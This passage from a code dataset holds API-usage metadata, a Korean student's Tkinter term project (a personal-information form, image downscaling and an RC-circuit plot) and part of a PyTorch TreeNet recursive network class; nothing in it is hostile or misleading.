"django.http.JsonResponse", "line_number": 73, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 75, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 75, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 78, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 82, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 82, "usage_type": "name"}, {"api_name": "rest_framework.generics.GenericAPIView", "line_number": 85, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.BorrowSerializer", "line_number": 87, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 95, "usage_type": "call"}, {"api_name": "Libraryapp.models.Client.objects.get", "line_number": 96, "usage_type": "call"}, {"api_name": "Libraryapp.models.Client.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Client", "line_number": 96, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 97, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects.filter", "line_number": 98, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 98, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 98, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 105, "usage_type": "call"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 106, "usage_type": "call"}, {"api_name": "Libraryapp.models.Books_at_library.objects.get", "line_number": 107, "usage_type": "call"}, {"api_name": "Libraryapp.models.Books_at_library.objects", "line_number": 107, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Books_at_library", "line_number": 107, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 109, "usage_type": "call"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 111, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 112, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 114, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 114, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 116, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 116, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 119, "usage_type": "call"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 122, "usage_type": "call"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.BorrowSerializer", "line_number": 123, "usage_type": "call"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 126, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 131, "usage_type": "call"}, {"api_name": "http.HTTPStatus.CREATED", "line_number": 133, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 133, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 135, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 137, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 137, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 140, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 144, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 144, "usage_type": "name"}, {"api_name": "rest_framework.generics.GenericAPIView", "line_number": 147, "usage_type": "name"}, {"api_name": "Libraryapp.models.Borrow.objects.all", "line_number": 149, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 149, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 149, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.BorrowSerializer", "line_number": 150, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 155, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects.get", "line_number": 156, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 156, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 156, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 159, "usage_type": "call"}, {"api_name": "Libraryapp.models.Books_at_library.objects.get", "line_number": 160, "usage_type": "call"}, {"api_name": "Libraryapp.models.Books_at_library.objects", "line_number": 160, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Books_at_library", "line_number": 160, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 161, "usage_type": "call"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 166, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 169, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 171, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 171, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 174, "usage_type": "call"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 175, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 177, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 181, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 181, "usage_type": "name"}, {"api_name": "rest_framework.generics.GenericAPIView", "line_number": 184, "usage_type": "name"}, {"api_name": "Libraryapp.models.Borrow.objects.all", "line_number": 186, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 186, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 186, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.BorrowSerializer", "line_number": 187, "usage_type": "name"}, {"api_name": "Libraryapp.models.Borrow.objects.get", "line_number": 201, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 201, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 201, "usage_type": "name"}, {"api_name": "Libraryapp.models.Library.objects.get", "line_number": 203, "usage_type": "call"}, {"api_name": "Libraryapp.models.Library.objects", "line_number": 203, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Library", "line_number": 203, "usage_type": "name"}, {"api_name": "Libraryapp.models.Book.objects.get", "line_number": 204, "usage_type": "call"}, {"api_name": "Libraryapp.models.Book.objects", "line_number": 204, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Book", "line_number": 204, "usage_type": "name"}, {"api_name": "Libraryapp.models.Client.objects.get", "line_number": 205, "usage_type": "call"}, {"api_name": "Libraryapp.models.Client.objects", "line_number": 205, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Client", "line_number": 205, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 211, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 214, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 216, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 216, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 219, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 223, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 223, "usage_type": "name"}, {"api_name": "rest_framework.generics.GenericAPIView", "line_number": 226, "usage_type": "name"}, {"api_name": "Libraryapp.models.Borrow.objects.all", "line_number": 228, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 228, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 228, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.GETBorrowSerializer", "line_number": 229, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 233, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects.get", "line_number": 234, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 234, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 234, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 237, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 238, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 238, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 241, "usage_type": "call"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 245, "usage_type": "call"}, {"api_name": "Libraryapp.models.Books_at_library.objects.get", "line_number": 246, "usage_type": "call"}, {"api_name": "Libraryapp.models.Books_at_library.objects", "line_number": 246, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Books_at_library", "line_number": 246, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 247, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 253, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 255, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 255, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 257, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 259, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 259, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 262, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 266, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 266, "usage_type": "name"}]}
+{"seq_id": "336406609", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jun 5 10:34:43 2021\r\n\r\n@author: 82102\r\n\"\"\"\r\nimport cv2\r\nimport numpy as np\r\nimport PIL\r\nimport matplotlib.pyplot as plt\r\nfrom tkinter import *\r\n\r\n\r\nclass MyInformation:\r\n\r\n \r\n def __init__(self) :\r\n self.window = Tk()\r\n self.window.title(\"개인정보\") \r\n self.window.geometry(\"750x320+700+10\")\r\n self.window.resizable(True,True)\r\n \r\n self.finishButton = Button(self.window, text = \"입력완료\", command = self.print).place(x = 0, y = 265, width = 100)\r\n self.saveButton = Button(self.window, text = \"저장\", command = self.save).place(x = 150, y = 265, width = 100)\r\n self.printButton = Button(self.window, text = \"출력\", command = self.scan).place(x = 300, y = 265, width = 100)\r\n self.RCButton = Button(self.window, text = \"RC circuit\", command = self.RC_Circuit).place(x = 450, y = 265, width = 100)\r\n self.IPButton = Button(self.window, text = \"Image processing\", command = self.Image_Processing).place(x = 600, y = 265, width = 100)\r\n \r\n self.label1 = Label(self.window, text = \"개인정보\").grid(row = 1, column = 1)\r\n self.label2 = Label(self.window, text = \"학점\").grid(row = 9, column = 1)\r\n self.label3 = Label(self.window, text = \"Image Processing\").place(x = 250, y = 0)\r\n self.label4 = Label(self.window, text = \"RC circuit\").place(x = 550, y = 0)\r\n \r\n self.label_name = Label(self.window, text = \"성명\").grid(row = 2, column = 0)\r\n self.name = StringVar()\r\n self.entry_name = Entry(self.window, width = 17, textvariable = self.name)\r\n self.entry_name.grid(row = 2, column = 1)\r\n \r\n \r\n \r\n self.label_age = Label(self.window, text = \"나이\").grid(row = 3, column = 0)\r\n self.age = StringVar()\r\n self.entry_age = Entry(self.window, width = 17, textvariable = self.age)\r\n self.entry_age.grid(row = 3, column = 1)\r\n \r\n \r\n self.label_studentNumber = Label(self.window, text = \"학번\").grid(row = 4, column = 0)\r\n self.studentNumber = StringVar()\r\n self.entry_studentNumber = Entry(self.window, width = 17, textvariable = self.studentNumber)\r\n self.entry_studentNumber.grid(row = 4, column = 1)\r\n \r\n self.label_grade = Label(self.window, text = \"학년\").grid(row = 5, column = 0)\r\n self.grade = StringVar()\r\n self.entry_grade = Entry(self.window, width = 17, textvariable = self.grade)\r\n self.entry_grade.grid(row = 5, column = 1)\r\n \r\n self.label_major = Label(self.window, text = \"전공\").grid(row = 6, column = 0)\r\n self.major = StringVar()\r\n self.entry_major = Entry(self.window, width = 17, textvariable = self.major)\r\n self.entry_major.grid(row = 6, column = 1)\r\n \r\n self.label_email = Label(self.window, text = \"email\").grid(row = 7, column = 0)\r\n self.email = StringVar()\r\n self.entry_email = Entry(self.window, width = 17, textvariable = self.email)\r\n self.entry_email.grid(row = 7, column = 1)\r\n \r\n self.label_score1 = Label(self.window, text = \"1학년\").grid(row = 10, column = 0)\r\n self.score1 = StringVar()\r\n self.entry_score1 = Entry(self.window, width = 3, textvariable = self.score1)\r\n self.entry_score1.grid(row = 10, column = 1)\r\n \r\n self.label_score2 = Label(self.window, text = \"2학년\").grid(row = 11, column = 0)\r\n self.score2 = StringVar()\r\n self.entry_score2 = Entry(self.window, width = 3, textvariable = self.score2)\r\n self.entry_score2.grid(row = 11, column = 1)\r\n \r\n self.label_score3 = Label(self.window, text = \"3학년\").grid(row = 12, column = 0)\r\n self.score3 = StringVar()\r\n self.entry_score3 = Entry(self.window, width = 3, textvariable = self.score3)\r\n self.entry_score3.grid(row = 12, column = 1)\r\n \r\n self.label_score4 = Label(self.window, text = \"4학년\").grid(row = 13, column = 0)\r\n self.score4 = StringVar()\r\n self.entry_score4 = Entry(self.window, width = 3, textvariable = self.score4)\r\n self.entry_score4.grid(row = 13, column = 1)\r\n \r\n self.window.mainloop()\r\n \r\n\r\n def print(self) :\r\n print(\"이름 :\", self.name.get())\r\n print(\"나이 :\", self.age.get())\r\n print(\"학번 :\", self.studentNumber.get())\r\n print(\"학년 :\", self.grade.get())\r\n print(\"전공 :\", self.major.get())\r\n print(\"email :\", self.email.get())\r\n print(\"1학년 학점 :\", self.score1.get())\r\n print(\"2학년 학점 :\", self.score2.get())\r\n print(\"3학년 학점 :\", self.score3.get())\r\n print(\"4학년 학점 :\", self.score4.get())\r\n \r\n def save(self) :\r\n f = open(\"20205220_이바다.txt\", 'w')\r\n f.write(\"{}\\n\".format(self.name.get()))\r\n f.write(\"{}\\n\".format(self.age.get()))\r\n f.write(\"{}\\n\".format(self.studentNumber.get()))\r\n f.write(\"{}\\n\".format(self.grade.get()))\r\n f.write(\"{}\\n\".format(self.major.get()))\r\n f.write(\"{}\\n\".format(self.email.get()))\r\n f.write(\"{}\\n\".format(self.score1.get()))\r\n f.write(\"{}\\n\".format(self.score2.get()))\r\n f.write(\"{}\\n\".format(self.score3.get()))\r\n f.write(self.score4.get())\r\n \r\n f.close()\r\n print(\"파일에 저장되었습니다.\")\r\n \r\n def scan(self) :\r\n f = open(\"20205220_이바다.txt\", 'r')\r\n self.entry_name.delete(0,END)\r\n self.entry_age.delete(0,END)\r\n self.entry_studentNumber.delete(0,END)\r\n self.entry_grade.delete(0,END)\r\n self.entry_major.delete(0,END)\r\n self.entry_email.delete(0,END)\r\n self.entry_score1.delete(0,END)\r\n self.entry_score2.delete(0,END)\r\n self.entry_score3.delete(0,END)\r\n self.entry_score4.delete(0,END)\r\n\r\n self.entry_name.insert(0, f.readline())\r\n self.entry_age.insert(0, f.readline())\r\n self.entry_studentNumber.insert(0, f.readline())\r\n self.entry_grade.insert(0, f.readline())\r\n self.entry_major.insert(0, f.readline())\r\n self.entry_email.insert(0, f.readline())\r\n self.entry_score1.insert(0, f.readline())\r\n self.entry_score2.insert(0, f.readline())\r\n self.entry_score3.insert(0, f.readline())\r\n self.entry_score4.insert(0, f.readline())\r\n \r\n f.close()\r\n \r\n\r\n def Image_Processing(self) :\r\n image_shape = (384, 384, 3)\r\n working_dir = \".//\"\r\n def lr_images(images_real, downscale) :\r\n images = []\r\n images.append(np.array(PIL.Image.fromarray(images_real).resize([images_real.shape[0]//downscale,images_real.shape[1]//downscale],\r\n resample=PIL.Image.BICUBIC)))\r\n images_lr = np.array(images)\r\n return images_lr \r\n \r\n img2 = cv2.imread(working_dir + 'Pic1.png', cv2.IMREAD_UNCHANGED)\r\n print(\"img2\", img2)\r\n print(\"img2 size :\", img2.size)\r\n print(\"img2 shape :\", img2.shape)\r\n \r\n img3 = np.reshape(img2[:,:,:3],(384,384,3))\r\n print(\"img3\",img3)\r\n print(\"img3 size :\",img3.size)\r\n print(\"img3 shape :\",img3.shape)\r\n \r\n img4 = lr_images(img3,4)\r\n print(\"img4\",img4)\r\n print(\"img4 size :\",img4.size)\r\n print(\"img4 shape :\",img4.shape)\r\n \r\n figsize = (24, 10)\r\n dim = (1, 2)\r\n plt.figure(figsize=figsize)\r\n plt.subplot(dim[0], dim[1], 1)\r\n plt.imshow(img2, interpolation = 'nearest')\r\n plt.title('Original : 384x384 ')\r\n plt.subplot(dim[0], dim[1], 2)\r\n plt.imshow(img4[0], interpolation = 'nearest')\r\n plt.title('Origianal Low Resolution : 96x96 ')\r\n plt.savefig(\"o1.png\")\r\n plt.show()\r\n \r\n cv2.imwrite(working_dir + 'Pic1.png', img4[0])\r\n \r\n img2 = cv2.imread(working_dir + 'Pic2.png', cv2.IMREAD_UNCHANGED)\r\n print(\"img2\", img2)\r\n print(\"img2 size :\", img2.size)\r\n print(\"img2 shape :\", img2.shape)\r\n \r\n img3 = np.reshape(img2[:,:,:3],(384,384,3))\r\n print(\"img3\",img3)\r\n print(\"img3 size :\",img3.size)\r\n print(\"img3 shape :\",img3.shape)\r\n \r\n img4 = lr_images(img3,4)\r\n print(\"img4\",img4)\r\n print(\"img4 size :\",img4.size)\r\n print(\"img4 shape :\",img4.shape)\r\n \r\n figsize = (24, 10)\r\n dim = (1, 2)\r\n plt.figure(figsize=figsize)\r\n plt.subplot(dim[0], dim[1], 1)\r\n plt.imshow(img2, interpolation = 'nearest')\r\n plt.title('Original : 384x384 ')\r\n plt.subplot(dim[0], dim[1], 2)\r\n plt.imshow(img4[0], interpolation = 'nearest')\r\n plt.title('Origianal Low Resolution : 96x96 ')\r\n plt.savefig(\"o2.png\")\r\n plt.show()\r\n \r\n cv2.imwrite(working_dir + 'Pic2.png', img4[0])\r\n \r\n photo = cv2.imread(\"o1.png\", cv2.IMREAD_UNCHANGED)\r\n photo_resize = cv2.resize(photo, dsize=(200, 100), interpolation=cv2.INTER_AREA)\r\n cv2.imwrite(working_dir + 'o1.png', photo_resize)\r\n self.photo1 = PhotoImage(file = 'o1.png')\r\n self.photo1_label = Label(self.window, image = self.photo1).place(x = 200, y = 25)\r\n \r\n \r\n photo = cv2.imread(\"o2.png\", cv2.IMREAD_UNCHANGED)\r\n photo_resize = cv2.resize(photo, dsize=(200, 100), interpolation=cv2.INTER_AREA)\r\n cv2.imwrite(working_dir + 'o2.png', photo_resize)\r\n self.photo = PhotoImage(file = 'o2.png')\r\n self.photo_label = Label(self.window, image = self.photo).place(x = 200, y = 125)\r\n \r\n img_destroy = 1\r\n while img_destroy == 1 :\r\n img_destroy = int(input(\"input 0 to clear images.\"))\r\n else :\r\n cv2.destroyAllWindows()\r\n \r\n self.window.mainloop()\r\n\r\n \r\n def RC_Circuit(self) :\r\n Ydat = []\r\n Xdat = []\r\n Ndat = []\r\n n_max=6000\r\n \r\n R = 10000\r\n C = 0.000001\r\n dt = 0.00001\r\n \r\n Ytemp =0\r\n Xdat.append(Ytemp)\r\n Ydat.append(Ytemp)\r\n num = dt/R/C\r\n for n in range(0, n_max) :\r\n Xtemp=1\r\n Ytemp1=Ytemp\r\n Ytemp=(1-num)*Ytemp1+num*Xtemp\r\n Xdat.append(n*dt)\r\n Ydat.append(Ytemp)\r\n Ndat.append(n)\r\n print(Ydat)\r\n \r\n \r\n \r\n plt.figure(1)\r\n \r\n plt.plot(Xdat, Ydat)\r\n plt.xlabel('Time(sec)')\r\n plt.ylabel('VC', fontsize=20)\r\n plt.axis([0,0.1,0,2])\r\n plt.title(\"Step Response\")\r\n plt.grid(True)\r\n plt.savefig('graph.png', dpi=45)\r\n \r\n self.gImage = PhotoImage(file = 'graph.png')\r\n self.label_g = Label(self.window, image = self.gImage).place(x = 450, y = 25)\r\n self.window.mainloop()\r\n \r\n \r\n \r\n \r\nmyinformation = MyInformation()\r\n\r\n \r\n ", "repo_name": "lbd0/python2021", "sub_path": "20205220_이바다_termproject.py", "file_name": "20205220_이바다_termproject.py", "file_ext": "py", "file_size_in_byte": 11096, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.array", "line_number": 150, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 150, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 150, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 151, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 152, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 155, "usage_type": "call"}, {"api_name": "cv2.IMREAD_UNCHANGED", "line_number": 155, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 175, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 182, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 184, "usage_type": "call"}, {"api_name": "cv2.IMREAD_UNCHANGED", "line_number": 184, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 189, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 208, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 208, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 211, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 213, "usage_type": "call"}, {"api_name": "cv2.IMREAD_UNCHANGED", "line_number": 213, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 214, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 214, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 215, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 220, "usage_type": "call"}, {"api_name": "cv2.IMREAD_UNCHANGED", "line_number": 220, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 221, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 221, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 222, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 230, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 262, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 262, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 264, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 264, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 265, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 265, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 267, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 268, "usage_type": "name"}]}
+{"seq_id": "2549760212", "text": "import torch\nfrom torch import nn\n\nclass TreeNet(nn.Module):\n \"\"\"Class for recursive neural networks with n-ary tree structure.\n\n The class supports batch processing of tree-like objects with\n bounded branching factor.\n The class is intended as a base class for recursive neural networks.\n\n Given a `unit` network for processing single nodes (see note below),\n the TreeNet class returns a network capable of processing (properly\n encoded) trees.\n\n Note:\n The `unit` network specifies what should be done for each node of\n the input trees. It receives as input three parameters:\n - inputs: A Tensor containing the input features of\n the current nodes. Of shape `(batch_size, input_size)`.\n - children: A list, of size `branching_factor`, of Tensors\n containing the output features of the children of the\n current nodes.\n Each Tensor has the shape `(batch_size, output_size)`.\n If a node has less arity than the `branching_factor`,\n the features corresponding to children absent from the\n node are guaranteed to have magnitude zero.\n - arities: A LongTensor containing the arities of the nodes.\n Of shape `(batch_size,)`.\n The `unit` network should return the output features for the current\n nodes, which should be of shape `(batch_size, output_size)`.\n\n Args:\n output_size (int): Number of features output by the `unit` network.\n branching_factor (int): Largest branching factor of input trees.\n unit (torch.nn.Module): Network used for processing nodes.\n\n See Also:\n See the `treenet.encoder` module for how to encode trees and batches\n of trees.\n\n References:\n Bowman, S. R., Gauthier, J., Rastogi, A., Gupta, R.,\n Manning, C. D., & Potts, C. (2016).\n A Fast Unified Model for Parsing and Sentence Understanding.\n \"\"\"\n\n\n def __init__(self, output_size, branching_factor=2, unit=None):\n super(TreeNet, self).__init__()\n self.output_size = output_size\n self.branching_factor = branching_factor\n if unit is not None:\n self.unit = unit\n\n\n def forward(self, inputs, arities, batch_first=False):\n \"\"\"Feed the network with encoded tree-like objects.\n\n Args:\n inputs (Tensor): The features.\n Should be of shape `(time, batch_size, input_size)`.\n arities (LongTensor): The arities of the nodes.\n Should be of shape `(time, batch_size)`.\n batch_first (bool): If ``True``, then `inputs` and `arities`\n are expected to have the batch dimension first.\n\n Note:\n Inputs and arities of nodes are expected to appear in\n right-first post-order. See the `treenet.encoder`\n module for building a suitable encoder.\n\n Returns:\n Tensor: The output features,\n of shape `(batch_size, output_size)`.\n \"\"\"\n\n if batch_first:\n inputs = inputs.permute(1, 0, 2)\n arities = arities.permute(1, 0)\n\n # Time size.\n T = inputs.size(0)\n\n # Batch size.\n B = inputs.size(1)\n\n # 0, 1 .. B - 1. Used for indexing.\n k = arities.new(range(B))\n\n # Memory will contain the state of every node.\n memory = inputs.new_zeros(T, B, self.output_size)\n\n # The stack maintains pointers to the memory for unmerged subtrees.\n # It contains extra entries, to avoid out of bounds accesses.\n stack = arities.new_zeros(B, T + self.branching_factor)\n\n # Points to the head of the stack.\n # Starts at the given index in order to avoid out of bounds reads.\n stack_pointer = arities.new_full((B,), self.branching_factor - 1)\n\n for t in range(T):\n arity = arities[t]\n current = inputs[t]\n\n entries = []\n for i in range(self.branching_factor):\n entry = memory[stack[k, stack_pointer - i], k]\n mask = entry.new_empty(B)\n mask.copy_(arity > i)\n mask = mask.unsqueeze(1).expand(entry.size())\n entries.append(entry * mask)\n\n # Obtain the state for the node.\n new_entry = self.unit(current, entries, arity)\n\n # If multiple entries are returned, each entry must be\n # appropriately masked.\n if type(new_entry) is list or type(new_entry) is tuple:\n for i, entry in enumerate(new_entry):\n factors = entry.new_empty(B)\n factors.copy_(arity == i)\n factors = factors.unsqueeze(1).expand(entry.size())\n memory[t] = memory[t] + (entry * factors)\n else:\n memory[t] = new_entry\n\n # Update the stack pointer.\n stack_pointer.add_(-torch.abs(arity) + 1)\n\n # Ensure that the top of the stack is untouched if the arity is the\n # special value -1.\n ignore = (arity == -1).long()\n stack[k, stack_pointer] *= ignore\n stack[k, stack_pointer] += t * ((ignore + 1) % 2)\n\n # Return the content of the memory location\n # pointed by the top of the stack.\n return memory[stack[k, 